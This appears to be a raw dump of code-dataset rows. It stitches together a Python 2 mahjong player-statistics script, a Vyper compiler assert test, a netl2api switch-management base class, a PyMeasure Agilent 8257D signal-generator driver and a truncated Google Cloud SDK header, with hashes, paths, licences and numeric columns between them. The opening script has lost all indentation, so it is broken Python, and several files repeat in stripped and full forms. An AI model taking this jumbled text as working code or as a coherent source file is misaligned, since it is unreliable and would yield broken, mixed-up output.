for player_index, card_in in enumerate(self.cards_ins):
for time_index, action in enumerate(card_in):
if self._richi_list[player_index] is not None:
richi_time, richi_action = self._richi_list[player_index]
if time_index >= richi_time:
break
if self._fulu_list[player_index]:
break
elif not isinstance(action, int):
self._fulu_list[player_index] = True
def get_result(self, player_index):
# attack
point_change = sum(sc[player_index] for sc in self.point_changes)
win = self.is_agari and point_change > 0
win_point = point_change if win else None
# speed
first_richi = self.richi_list[player_index]
if first_richi:
for richi in self.richi_list:
if richi is not None and richi[0] < first_richi[0]:
first_richi = False
break
first_richi = bool(first_richi)
win_time = None
if win:
win_time = len(self.cards_ins[player_index])
# int
dama = None
if win:
dama = not self.is_fulu_list[player_index] and not self.richi_list[player_index]
ends_listening = None
if self.result_description == u'全員聴牌':
ends_listening = True
elif self.result_description == u'流局':
ends_listening = point_change > 0
# def
someone_chong = self.result_description == u'和了' and \
len(self.point_changes) == 1 and \
sum(p < 0 for p in self.point_changes[0]) == 1
chong = someone_chong and point_change < 0
fulu_chong = None
if chong:
fulu_chong = self.is_fulu_list[player_index]
# brave
after_richi = not first_richi and bool(self.richi_list[player_index])
fulu = self.is_fulu_list[player_index]
return dict(
win=win, win_point=win_point,
first_richi=first_richi, win_time=win_time,
dama=dama, ends_listening=ends_listening,
chong=chong, fulu_chong=fulu_chong,
after_richi=after_richi, fulu=fulu
)
def get_results(ref_list, player_name):
"""
do statistics on given refs for given player
result dict format (example value is avg value on data set 2015/05/15) :
{
fulu_chong : 0.3940,
dama : 0.1165,
win_time : 11.50,
chong : 0.1347,
win : 0.2484,
win_point : 6690,
ends_listening : 0.5170,
fulu : 0.3717,
after_richi : 0.0288,
now_line_days : 3.71,
max_line_days : 16.67,
first_richi : 0.1597,
count : 1000,
}
:param ref_list: ref list
:param player_name: player name
:return: result dict
"""
counter = {}
adder = {}
game_date_text_set = set()
ref_counter = 0
for ref in ref_list:
ref_counter += 1
log = Log(ref)
game_date_text_set.add(log.time.strftime("%Y%m%d"))
player_index = log.get_player_index(player_name)
if player_index < 0:
# should not be here
continue
for sub_log in log.sub_log:
statistics = StatisticForSubLog(sub_log)
results = statistics.get_result(player_index)
for key, value in results.iteritems():
if value is not None:
counter[key] = counter.get(key, 0) + 1
adder[key] = adder.get(key, 0) + value
results = {}
for key, value in counter.iteritems():
results[key] = (adder[key] / float(value)) if value else 0
max_line_days = now_line_days = 0
last_date = None
for date_text in sorted(game_date_text_set):
now_date = datetime.datetime.strptime(date_text, "%Y%m%d")
if last_date:
if int((now_date - last_date).days) <= 1:
now_line_days += 1
max_line_days = max(max_line_days, now_line_days)
else:
now_line_days = 1
last_date = now_date
results['max_line_days'] = max_line_days
results['now_line_days'] = now_line_days
results['count'] = ref_counter
return results
if __name__ == '__main__':
import time
from sqlalchemy import func, desc
from core.models import get_new_session, PlayerLog
session = get_new_session()
counter = func.count(PlayerLog.name)
query = session.query(PlayerLog.name).filter((PlayerLog.lobby == '0000') & (PlayerLog.name != 'NoName')) \
.group_by(PlayerLog.name).having(counter >= 50).order_by(desc(counter))
results = {}
for name in (row[0] for row in query):
start_time = time.time()
query = session.query(PlayerLog.ref).filter((PlayerLog.name == name) & (PlayerLog.lobby == '0000'))
refs = [row[0] for row in query]
results[name] = get_results(refs, name)
size = len(refs)
time_cost = time.time() - start_time
hz = size / time_cost
print '%6d' % size, '%.2fs' % time_cost, '%.2fHz' % hz, name
session.close()
data_lists = {}
for row in results.itervalues():
for key, value in row.iteritems():
data_lists.setdefault(key, []).append(value)
def format_data(d):
if d < 1:
return '%6s' % ('%.2f%%' % (d * 100))
elif abs(d) < 100:
return '%6s' % ('%.2f' % d)
else:
return '%6s' % ('%d' % d)
print ''
print '%20s' % 'type', '%6s' % 'avg', '%6s' % 'max', '%6s' % 'min', '%6s' % 'mu'
# import numpy as np
from scipy.stats import norm
# import matplotlib.pyplot as plt
for key, data_list in data_lists.iteritems():
avg = sum(data_list) / float(len(data_list))
mu, std = norm.fit(data_list)
print '%20s' % key, format_data(avg), format_data(max(data_list)), format_data(min(data_list)), format_data(
mu), std
#
# # Plot the histogram.
# plt.hist(data_list, bins=25, normed=True, alpha=0.6, color='g')
#
# # Plot the PDF.
# xmin, xmax = plt.xlim()
# x = np.linspace(xmin, xmax, 100)
# p = norm.pdf(x, mu, std)
# plt.plot(x, p, 'k', linewidth=2)
# title = "%s fit results: mu = %.2f, std = %.2f" % (key, mu, std)
# plt.title(title)
#
# plt.show()
| 30
| 2,357
| 0
| 4,883
| 0
| 185
| 0
| 0
| 73
|
b97e642f766dedecd2b8dc7fbaf1c4aba0a274fb
| 5,267
|
py
|
Python
|
tests/parser/features/test_assert.py
|
upgradvisor/vyper
|
642884ea938a25793c1b2fac866e8458e63a7b49
|
[
"Apache-2.0"
] | 1
|
2021-12-20T16:19:47.000Z
|
2021-12-20T16:19:47.000Z
|
tests/parser/features/test_assert.py
|
upgradvisor/vyper
|
642884ea938a25793c1b2fac866e8458e63a7b49
|
[
"Apache-2.0"
] | 1
|
2022-03-19T00:45:47.000Z
|
2022-03-19T00:45:47.000Z
|
tests/parser/features/test_assert.py
|
upgradvisor/vyper
|
642884ea938a25793c1b2fac866e8458e63a7b49
|
[
"Apache-2.0"
] | null | null | null |
# web3 returns f"execution reverted: {err_str}"
# TODO move exception string parsing logic into assert_tx_failed
invalid_code = [
"""
@external
def test(a: int128) -> int128:
assert a > 1, ""
return 1 + a
""",
"""
@external
def test(a: int128) -> int128:
raise ""
""",
"""
@external
def test():
assert create_forwarder_to(self)
""",
]
valid_code = [
"""
@external
def mint(_to: address, _value: uint256):
raise
""",
"""
@internal
def ret1() -> int128:
return 1
@external
def test():
assert self.ret1() == 1
""",
"""
@internal
def valid_address(sender: address) -> bool:
selfdestruct(sender)
@external
def test():
assert self.valid_address(msg.sender)
""",
"""
@external
def test():
assert raw_call(msg.sender, b'', max_outsize=1, gas=10, value=1000*1000) == b''
""",
"""
@external
def test():
assert create_forwarder_to(self) == self
""",
]
| 25.444444
| 94
| 0.65806
|
import pytest
from eth_abi import decode_single
from eth_tester.exceptions import TransactionFailed
# web3 returns f"execution reverted: {err_str}"
# TODO move exception string parsing logic into assert_tx_failed
def _fixup_err_str(s):
return s.replace("execution reverted: ", "")
def test_assert_refund(w3, get_contract_with_gas_estimation, assert_tx_failed):
code = """
@external
def foo():
assert 1 == 2
"""
c = get_contract_with_gas_estimation(code)
a0 = w3.eth.accounts[0]
gas_sent = 10 ** 6
tx_hash = c.foo(transact={"from": a0, "gas": gas_sent, "gasPrice": 10})
# More info on receipt status:
# https://github.com/ethereum/EIPs/blob/master/EIPS/eip-658.md#specification.
tx_receipt = w3.eth.getTransactionReceipt(tx_hash)
assert tx_receipt["status"] == 0
# Checks for gas refund from revert
assert tx_receipt["gasUsed"] < gas_sent
def test_assert_reason(w3, get_contract_with_gas_estimation, assert_tx_failed, memory_mocker):
code = """
@external
def test(a: int128) -> int128:
assert a > 1, "larger than one please"
return 1 + a
@external
def test2(a: int128, b: int128, extra_reason: String[32]) -> int128:
c: int128 = 11
assert a > 1, "a is not large enough"
assert b == 1, concat("b may only be 1", extra_reason)
return a + b + c
@external
def test3(reason_str: String[32]):
raise reason_str
"""
c = get_contract_with_gas_estimation(code)
assert c.test(2) == 3
with pytest.raises(TransactionFailed) as e_info:
c.test(0)
assert _fixup_err_str(e_info.value.args[0]) == "larger than one please"
# a = 0, b = 1
with pytest.raises(TransactionFailed) as e_info:
c.test2(0, 1, "")
assert _fixup_err_str(e_info.value.args[0]) == "a is not large enough"
# a = 1, b = 0
with pytest.raises(TransactionFailed) as e_info:
c.test2(2, 2, " because I said so")
assert _fixup_err_str(e_info.value.args[0]) == "b may only be 1" + " because I said so"
# return correct value
assert c.test2(5, 1, "") == 17
with pytest.raises(TransactionFailed) as e_info:
c.test3("An exception")
assert _fixup_err_str(e_info.value.args[0]) == "An exception"
invalid_code = [
"""
@external
def test(a: int128) -> int128:
assert a > 1, ""
return 1 + a
""",
"""
@external
def test(a: int128) -> int128:
raise ""
""",
"""
@external
def test():
assert create_forwarder_to(self)
""",
]
@pytest.mark.parametrize("code", invalid_code)
def test_invalid_assertions(get_contract, assert_compile_failed, code):
assert_compile_failed(lambda: get_contract(code))
valid_code = [
"""
@external
def mint(_to: address, _value: uint256):
raise
""",
"""
@internal
def ret1() -> int128:
return 1
@external
def test():
assert self.ret1() == 1
""",
"""
@internal
def valid_address(sender: address) -> bool:
selfdestruct(sender)
@external
def test():
assert self.valid_address(msg.sender)
""",
"""
@external
def test():
assert raw_call(msg.sender, b'', max_outsize=1, gas=10, value=1000*1000) == b''
""",
"""
@external
def test():
assert create_forwarder_to(self) == self
""",
]
@pytest.mark.parametrize("code", valid_code)
def test_valid_assertions(get_contract, code):
get_contract(code)
def test_assert_staticcall(get_contract, assert_tx_failed, memory_mocker):
foreign_code = """
state: uint256
@external
def not_really_constant() -> uint256:
self.state += 1
return self.state
"""
code = """
interface ForeignContract:
def not_really_constant() -> uint256: view
@external
def test():
assert ForeignContract(msg.sender).not_really_constant() == 1
"""
c1 = get_contract(foreign_code)
c2 = get_contract(code, *[c1.address])
# static call prohibits state change
assert_tx_failed(lambda: c2.test())
def test_assert_in_for_loop(get_contract, assert_tx_failed, memory_mocker):
code = """
@external
def test(x: uint256[3]) -> bool:
for i in range(3):
assert x[i] < 5
return True
"""
c = get_contract(code)
c.test([1, 2, 3])
assert_tx_failed(lambda: c.test([5, 1, 3]))
assert_tx_failed(lambda: c.test([1, 5, 3]))
assert_tx_failed(lambda: c.test([1, 3, 5]))
def test_assert_with_reason_in_for_loop(get_contract, assert_tx_failed, memory_mocker):
code = """
@external
def test(x: uint256[3]) -> bool:
for i in range(3):
assert x[i] < 5, "because reasons"
return True
"""
c = get_contract(code)
c.test([1, 2, 3])
assert_tx_failed(lambda: c.test([5, 1, 3]))
assert_tx_failed(lambda: c.test([1, 5, 3]))
assert_tx_failed(lambda: c.test([1, 3, 5]))
def test_assert_reason_revert_length(w3, get_contract, memory_mocker):
code = """
@external
def test() -> int128:
assert 1 == 2, "oops"
return 1
"""
c = get_contract(code)
w3.manager.provider.ethereum_tester.backend.is_eip838_error = lambda err: False
with pytest.raises(TransactionFailed) as e_info:
c.test()
error_bytes = eval(_fixup_err_str(e_info.value.args[0]))
assert len(error_bytes) == 100
msg = decode_single("string", error_bytes[36:])
assert msg == "oops"
| 0
| 244
| 0
| 0
| 0
| 3,754
| 0
| 34
| 272
|
3f29ebd88cd6558019edc58f99d89c4d08dc0aae
| 8,654
|
py
|
Python
|
netl2api/l2api/__init__.py
|
locaweb/netl2api
|
f84c0362d1676c8771015b7cc48461e44a21c34d
|
[
"Apache-2.0"
] | 3
|
2015-04-08T18:50:02.000Z
|
2019-06-05T22:40:45.000Z
|
netl2api/l2api/__init__.py
|
locaweb/netl2api
|
f84c0362d1676c8771015b7cc48461e44a21c34d
|
[
"Apache-2.0"
] | null | null | null |
netl2api/l2api/__init__.py
|
locaweb/netl2api
|
f84c0362d1676c8771015b7cc48461e44a21c34d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8; -*-
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @author: Eduardo S. Scarpellini
# @author: Luiz Ozaki
__copyright__ = "Copyright 2012, Locaweb IDC"
__all__ = ["L2API"]
| 40.064815
| 122
| 0.605616
|
#!/usr/bin/python
# -*- coding: utf-8; -*-
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @author: Eduardo S. Scarpellini
# @author: Luiz Ozaki
__copyright__ = "Copyright 2012, Locaweb IDC"
from netl2api.l2api.exceptions import *
from netl2api.l2api.autocache import L2APIAutoCache
from netl2api.l2api.transport import SysSSHTransport #, TransportManager
__all__ = ["L2API"]
class L2API(L2APIAutoCache):
"""
Base class for L2 operations.
Vendor-specific classes should extend this, declare 'self.__VENDOR__' (vendor str),
'self.__HWTYPE__' (hardware type str), 'self.prompt_mark', 'self.error_mark' and
'self.config_term_cmd' (see transport classes for understand these three last parameters).
Ex.:
class ExampleVendorAPI(L2API):
def __init__(self, *args, **kwargs):
self.__VENDOR__ = "ExampleVendor"
self.__HWTYPE__ = "stackable_switch"
self.prompt_mark = "#"
self.error_mark = "% Error:"
self.config_term_cmd = "terminal length 0"
super(ExampleVendorAPI, self).__init__(*args, **kwargs)
...
def show_version(self):
...
def show_interfaces(self):
....
"""
def __init__(self, host=None, port=None, username=None, passwd=None, transport=None):
super(L2API, self).__init__()
if not hasattr(self, "__VENDOR__"):
raise InvalidParameter("'self.__VENDOR__' is not defined (class '%s')" % self.__class__.__name__)
if not hasattr(self, "__HWTYPE__"):
raise InvalidParameter("'self.__HWTYPE__' is not defined (class '%s')" % self.__class__.__name__)
if not host or type(host) not in (str, unicode):
raise InvalidParameter("'host' parameter is not defined or invalid")
if not username or type(username) not in (str, unicode):
raise InvalidParameter("'username' parameter is not defined or invalid")
if not passwd or type(passwd) not in (str, unicode):
raise InvalidParameter("'passwd' parameter is not defined or invalid")
if not hasattr(self, "prompt_mark"):
self.prompt_mark = "#"
if not hasattr(self, "error_mark"):
self.error_mark = None
if not hasattr(self, "config_term_cmd"):
self.config_term_cmd = None
if not transport:
transport = SysSSHTransport.SysSSH
self.use_cache = True
self.cache_config = {
"show_system": { "ttl": 600,
"clear_on": [] },
"show_hostname": { "ttl": 600,
"clear_on": [] },
"show_version": { "ttl": 600,
"clear_on": [] },
"show_interfaces": { "ttl": 120,
"clear_on": ["enable_interface", "disable_interface",
"change_interface_description"] },
"show_lldp": { "ttl": 180,
"clear_on": [] },
"show_arp": { "ttl": 180,
"clear_on": [] },
"show_uplinks": { "ttl": 180,
"clear_on": [] },
"show_vlans": { "ttl": 180,
"clear_on": ["create_vlan", "destroy_vlan",
"enable_vlan", "disable_vlan",
"change_vlan_description",
"interface_attach_vlan", "interface_detach_vlan",
"lag_attach_vlan", "lag_detach_vlan"] },
"show_lags": { "ttl": 180,
"clear_on": ["create_lag", "destroy_lag",
"enable_lag", "disable_lag",
"change_lag_description",
"lag_attach_interface", "lag_detach_interface"] },
}
#self.transport = TransportManager.TransportPool(transport=transport, max_connections=2, host=host, port=port,
# username=username, passwd=passwd, prompt_mark=self.prompt_mark,
# error_mark=self.error_mark, config_term_cmd=self.config_term_cmd)
self.transport = transport(host=host, port=port, username=username, passwd=passwd, prompt_mark=self.prompt_mark,
error_mark=self.error_mark, config_term_cmd=self.config_term_cmd)
def dump_config(self):
raise NotImplementedError("Not implemented")
def save_config(self):
raise NotImplementedError("Not implemented")
def show_system(self):
raise NotImplementedError("Not implemented")
def show_hostname(self):
raise NotImplementedError("Not implemented")
def show_version(self):
raise NotImplementedError("Not implemented")
def show_interfaces(self, interface_id=None):
raise NotImplementedError("Not implemented")
def show_lldp(self, interface_id=None):
raise NotImplementedError("Not implemented")
def show_arp(self, interface_id=None):
raise NotImplementedError("Not implemented")
def show_uplinks(self):
raise NotImplementedError("Not implemented")
def show_vlans(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def show_lags(self, lag_id=None):
raise NotImplementedError("Not implemented")
def create_vlan(self, vlan_id=None, vlan_description=None):
raise NotImplementedError("Not implemented")
def create_lag(self, lag_id=None, lag_description=None):
raise NotImplementedError("Not implemented")
def enable_interface(self, interface_id=None):
raise NotImplementedError("Not implemented")
def enable_vlan(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def enable_lag(self, lag_id=None):
raise NotImplementedError("Not implemented")
def disable_interface(self, interface_id=None):
raise NotImplementedError("Not implemented")
def disable_vlan(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def disable_lag(self, lag_id=None):
raise NotImplementedError("Not implemented")
def change_interface_description(self, interface_id=None, interface_description=None):
raise NotImplementedError("Not implemented")
def change_vlan_description(self, vlan_id=None, vlan_description=None):
raise NotImplementedError("Not implemented")
def change_lag_description(self, lag_id=None, lag_description=None):
raise NotImplementedError("Not implemented")
def destroy_vlan(self, vlan_id=None):
raise NotImplementedError("Not implemented")
def destroy_lag(self, lag_id=None):
raise NotImplementedError("Not implemented")
def interface_attach_vlan(self, interface_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def interface_detach_vlan(self, interface_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def lag_attach_vlan(self, lag_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def lag_detach_vlan(self, lag_id=None, vlan_id=None, tagged=True):
raise NotImplementedError("Not implemented")
def lag_attach_interface(self, lag_id=None, interface_id=None):
raise NotImplementedError("Not implemented")
def lag_detach_interface(self, lag_id=None, interface_id=None):
raise NotImplementedError("Not implemented")
# def __del__(self):
# if self.transport is not None:
# try:
# self.transport.close()
# except Exception:
# pass
| 0
| 0
| 0
| 7,694
| 0
| 0
| 0
| 79
| 110
|
53e3d50dfd8819a70c242ed90be54300221236ee
| 12,531
|
py
|
Python
|
pymeasure/instruments/agilent/agilent8257D.py
|
dphaas/pymeasure
|
580c33bf5f1e409bb575c46bbd1df682bf27cfe1
|
[
"MIT"
] | null | null | null |
pymeasure/instruments/agilent/agilent8257D.py
|
dphaas/pymeasure
|
580c33bf5f1e409bb575c46bbd1df682bf27cfe1
|
[
"MIT"
] | null | null | null |
pymeasure/instruments/agilent/agilent8257D.py
|
dphaas/pymeasure
|
580c33bf5f1e409bb575c46bbd1df682bf27cfe1
|
[
"MIT"
] | null | null | null |
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2022 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
| 36.533528
| 100
| 0.615194
|
#
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2022 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
from pymeasure.instruments import Instrument
from pymeasure.instruments.validators import truncated_range, strict_discrete_set
class Agilent8257D(Instrument):
"""Represents the Agilent 8257D Signal Generator and
provides a high-level interface for interacting with
the instrument.
.. code-block:: python
generator = Agilent8257D("GPIB::1")
generator.power = 0 # Sets the output power to 0 dBm
generator.frequency = 5 # Sets the output frequency to 5 GHz
generator.enable() # Enables the output
"""
power = Instrument.control(
":POW?;", ":POW %g dBm;",
""" A floating point property that represents the output power
in dBm. This property can be set.
"""
)
frequency = Instrument.control(
":FREQ?;", ":FREQ %e Hz;",
""" A floating point property that represents the output frequency
in Hz. This property can be set.
"""
)
start_frequency = Instrument.control(
":SOUR:FREQ:STAR?", ":SOUR:FREQ:STAR %e Hz",
""" A floating point property that represents the start frequency
in Hz. This property can be set.
"""
)
center_frequency = Instrument.control(
":SOUR:FREQ:CENT?", ":SOUR:FREQ:CENT %e Hz;",
""" A floating point property that represents the center frequency
in Hz. This property can be set.
"""
)
stop_frequency = Instrument.control(
":SOUR:FREQ:STOP?", ":SOUR:FREQ:STOP %e Hz",
""" A floating point property that represents the stop frequency
in Hz. This property can be set.
"""
)
start_power = Instrument.control(
":SOUR:POW:STAR?", ":SOUR:POW:STAR %e dBm",
""" A floating point property that represents the start power
in dBm. This property can be set.
"""
)
stop_power = Instrument.control(
":SOUR:POW:STOP?", ":SOUR:POW:STOP %e dBm",
""" A floating point property that represents the stop power
in dBm. This property can be set.
"""
)
dwell_time = Instrument.control(
":SOUR:SWE:DWEL1?", ":SOUR:SWE:DWEL1 %.3f",
""" A floating point property that represents the settling time
in seconds at the current frequency or power setting.
This property can be set.
"""
)
step_points = Instrument.control(
":SOUR:SWE:POIN?", ":SOUR:SWE:POIN %d",
""" An integer number of points in a step sweep. This property
can be set.
"""
)
is_enabled = Instrument.measurement(
":OUTPUT?",
""" Reads a boolean value that is True if the output is on. """,
cast=bool
)
has_modulation = Instrument.measurement(
":OUTPUT:MOD?",
""" Reads a boolean value that is True if the modulation is enabled. """,
cast=bool
)
########################
# Amplitude modulation #
########################
has_amplitude_modulation = Instrument.measurement(
":SOUR:AM:STAT?",
""" Reads a boolean value that is True if the amplitude modulation is enabled. """,
cast=bool
)
amplitude_depth = Instrument.control(
":SOUR:AM:DEPT?", ":SOUR:AM:DEPT %g",
""" A floating point property that controls the amplitude modulation
in precent, which can take values from 0 to 100 %. """,
validator=truncated_range,
values=[0, 100]
)
AMPLITUDE_SOURCES = {
'internal': 'INT', 'internal 2': 'INT2',
'external': 'EXT', 'external 2': 'EXT2'
}
amplitude_source = Instrument.control(
":SOUR:AM:SOUR?", ":SOUR:AM:SOUR %s",
""" A string property that controls the source of the amplitude modulation
signal, which can take the values: 'internal', 'internal 2', 'external', and
'external 2'. """,
validator=strict_discrete_set,
values=AMPLITUDE_SOURCES,
map_values=True
)
####################
# Pulse modulation #
####################
has_pulse_modulation = Instrument.measurement(
":SOUR:PULM:STAT?",
""" Reads a boolean value that is True if the pulse modulation is enabled. """,
cast=bool
)
PULSE_SOURCES = {
'internal': 'INT', 'external': 'EXT', 'scalar': 'SCAL'
}
pulse_source = Instrument.control(
":SOUR:PULM:SOUR?", ":SOUR:PULM:SOUR %s",
""" A string property that controls the source of the pulse modulation
signal, which can take the values: 'internal', 'external', and
'scalar'. """,
validator=strict_discrete_set,
values=PULSE_SOURCES,
map_values=True
)
PULSE_INPUTS = {
'square': 'SQU', 'free-run': 'FRUN',
'triggered': 'TRIG', 'doublet': 'DOUB', 'gated': 'GATE'
}
pulse_input = Instrument.control(
":SOUR:PULM:SOUR:INT?", ":SOUR:PULM:SOUR:INT %s",
""" A string property that controls the internally generated modulation
input for the pulse modulation, which can take the values: 'square', 'free-run',
'triggered', 'doublet', and 'gated'.
""",
validator=strict_discrete_set,
values=PULSE_INPUTS,
map_values=True
)
pulse_frequency = Instrument.control(
":SOUR:PULM:INT:FREQ?", ":SOUR:PULM:INT:FREQ %g",
""" A floating point property that controls the pulse rate frequency in Hertz,
which can take values from 0.1 Hz to 10 MHz. """,
validator=truncated_range,
values=[0.1, 10e6]
)
########################
# Low-Frequency Output #
########################
low_freq_out_amplitude = Instrument.control(
":SOUR:LFO:AMPL? ", ":SOUR:LFO:AMPL %g VP",
"""A floating point property that controls the peak voltage (amplitude) of the
low frequency output in volts, which can take values from 0-3.5V""",
validator=truncated_range,
values=[0, 3.5]
)
LOW_FREQUENCY_SOURCES = {
'internal': 'INT', 'internal 2': 'INT2', 'function': 'FUNC', 'function 2': 'FUNC2'
}
low_freq_out_source = Instrument.control(
":SOUR:LFO:SOUR?", ":SOUR:LFO:SOUR %s",
"""A string property which controls the source of the low frequency output, which
can take the values 'internal [2]' for the inernal source, or 'function [2]' for an internal
function generator which can be configured.""",
validator=strict_discrete_set,
values=LOW_FREQUENCY_SOURCES,
map_values=True
)
def enable_low_freq_out(self):
"""Enables low frequency output"""
self.write(":SOUR:LFO:STAT ON")
def disable_low_freq_out(self):
"""Disables low frequency output"""
self.write(":SOUR:LFO:STAT OFF")
def config_low_freq_out(self, source='internal', amplitude=3):
""" Configures the low-frequency output signal.
:param source: The source for the low-frequency output signal.
:param amplitude: Amplitude of the low-frequency output
"""
self.enable_low_freq_out()
self.low_freq_out_source = source
self.low_freq_out_amplitude = amplitude
#######################
# Internal Oscillator #
#######################
internal_frequency = Instrument.control(
":SOUR:AM:INT:FREQ?", ":SOUR:AM:INT:FREQ %g",
""" A floating point property that controls the frequency of the internal
oscillator in Hertz, which can take values from 0.5 Hz to 1 MHz. """,
validator=truncated_range,
values=[0.5, 1e6]
)
INTERNAL_SHAPES = {
'sine': 'SINE', 'triangle': 'TRI', 'square': 'SQU', 'ramp': 'RAMP',
'noise': 'NOIS', 'dual-sine': 'DUAL', 'swept-sine': 'SWEP'
}
internal_shape = Instrument.control(
":SOUR:AM:INT:FUNC:SHAP?", ":SOUR:AM:INT:FUNC:SHAP %s",
""" A string property that controls the shape of the internal oscillations,
which can take the values: 'sine', 'triangle', 'square', 'ramp', 'noise',
'dual-sine', and 'swept-sine'. """,
validator=strict_discrete_set,
values=INTERNAL_SHAPES,
map_values=True
)
def __init__(self, adapter, **kwargs):
super().__init__(
adapter, "Agilent 8257D RF Signal Generator", **kwargs
)
def enable(self):
""" Enables the output of the signal. """
self.write(":OUTPUT ON;")
def disable(self):
""" Disables the output of the signal. """
self.write(":OUTPUT OFF;")
def enable_modulation(self):
self.write(":OUTPUT:MOD ON;")
self.write(":lfo:sour int; :lfo:ampl 2.0vp; :lfo:stat on;")
def disable_modulation(self):
""" Disables the signal modulation. """
self.write(":OUTPUT:MOD OFF;")
self.write(":lfo:stat off;")
def config_amplitude_modulation(self, frequency=1e3, depth=100.0, shape='sine'):
""" Configures the amplitude modulation of the output signal.
:param frequency: A modulation frequency for the internal oscillator
:param depth: A linear depth precentage
:param shape: A string that describes the shape for the internal oscillator
"""
self.enable_amplitude_modulation()
self.amplitude_source = 'internal'
self.internal_frequency = frequency
self.internal_shape = shape
self.amplitude_depth = depth
def enable_amplitude_modulation(self):
""" Enables amplitude modulation of the output signal. """
self.write(":SOUR:AM:STAT ON")
def disable_amplitude_modulation(self):
""" Disables amplitude modulation of the output signal. """
self.write(":SOUR:AM:STAT OFF")
def config_pulse_modulation(self, frequency=1e3, input='square'):
""" Configures the pulse modulation of the output signal.
:param frequency: A pulse rate frequency in Hertz
:param input: A string that describes the internal pulse input
"""
self.enable_pulse_modulation()
self.pulse_source = 'internal'
self.pulse_input = input
self.pulse_frequency = frequency
def enable_pulse_modulation(self):
""" Enables pulse modulation of the output signal. """
self.write(":SOUR:PULM:STAT ON")
def disable_pulse_modulation(self):
""" Disables pulse modulation of the output signal. """
self.write(":SOUR:PULM:STAT OFF")
def config_step_sweep(self):
""" Configures a step sweep through frequency """
self.write(":SOUR:FREQ:MODE SWE;"
":SOUR:SWE:GEN STEP;"
":SOUR:SWE:MODE AUTO;")
def enable_retrace(self):
self.write(":SOUR:LIST:RETR 1")
def disable_retrace(self):
self.write(":SOUR:LIST:RETR 0")
def single_sweep(self):
self.write(":SOUR:TSW")
def start_step_sweep(self):
""" Starts a step sweep. """
self.write(":SOUR:SWE:CONT:STAT ON")
def stop_step_sweep(self):
""" Stops a step sweep. """
self.write(":SOUR:SWE:CONT:STAT OFF")
def shutdown(self):
""" Shuts down the instrument by disabling any modulation
and the output signal.
"""
self.disable_modulation()
self.disable()
| 0
| 0
| 0
| 11,223
| 0
| 0
| 0
| 83
| 68
|
dec7d6d3d15ea5d55e90e3e5423d903170fe436f
| 12,428
|
py
|
Python
|
lib/googlecloudsdk/command_lib/storage/resources/s3_resource_reference.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 2
|
2019-11-10T09:17:07.000Z
|
2019-12-18T13:44:08.000Z
|
lib/googlecloudsdk/command_lib/storage/resources/s3_resource_reference.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | null | null | null |
lib/googlecloudsdk/command_lib/storage/resources/s3_resource_reference.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
2a48a04df14be46c8745050f98768e30474a1aac
|
[
"Apache-2.0"
] | 1
|
2020-07-25T01:40:19.000Z
|
